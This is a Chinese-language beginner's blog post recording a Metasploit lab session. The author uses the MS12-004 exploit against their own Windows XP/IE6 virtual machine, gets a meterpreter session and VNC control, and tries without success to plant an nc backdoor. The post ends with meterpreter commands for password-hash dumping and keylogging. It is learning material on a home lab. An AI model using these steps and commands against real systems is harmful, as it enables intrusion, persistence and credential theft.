對metasploit非常感興趣,所以最近看了很多的教程。這篇是我模仿作者Breaker寫的一篇入門級滲透,真的很入門。還望大神忽視。
單純的想記錄下我學習的結果zzzzzzzzzzzzzzzzzzzzz
環境:
1.kali Linux。
2.XP IE6。
好的,如下zzz:
1.msfconsole
2輸入命令 search ms12_004,找 ms12-004 漏洞的利用模塊
3.使用那個模塊
4.設置一些參數:SRVHOST,payload(載荷) LHOST, URIPATH
5顯示參數 show options
6.利用exploit
7用另一個虛擬機XP進入Using URL :http://192.168.10.134:8080/
它已卡死,接着瀏覽器自動退了吧。
8.Sucessfully! 查看會話:sessions
9.連接會話sessions -i 1,進入了meterpreter,並截圖,。
10.run vnc虛擬連接進入,控制主機
11.當然這樣不算完結,還要留後門,下次進入。Upload一個nc,(⑥⑥⑥的瑞士軍刀)
蛋蛋蛋但是,後門我不會啊,試了好多次沒成功,感覺好難搞似得,下次再研究,這次先到這了,已成功拿下我的XP。。。。
好菜 。。。。好水,不怎麼懂鬱悶。。。。。。。。。。。。。。。。。。
我去喝杯飲料壓壓驚。。。。。
常用的 Meterpreter命令
Meterpreter 是一個很強大的payload , 具體說明輸入help可以看到,
Meterpreter hashdump // 可以看到進程主機帳號和加密後的密碼
keyscan_start //開啓鍵盤記錄
heyscan_dump // 查看鍵盤記
keyscan_stop // 關閉鍵盤
ps // 獲取進程主機進程列表
好了感謝教程所有者:Breaker。!! 雖然不認識,但是給了我好大幫助,特別信心啊!!!
(ps:後門不怎麼懂(⊙o⊙)。)。哪位大神能否交流交流~~~~~~~~~~~~。
還有1分鐘熄燈了,趕緊上傳睡覺。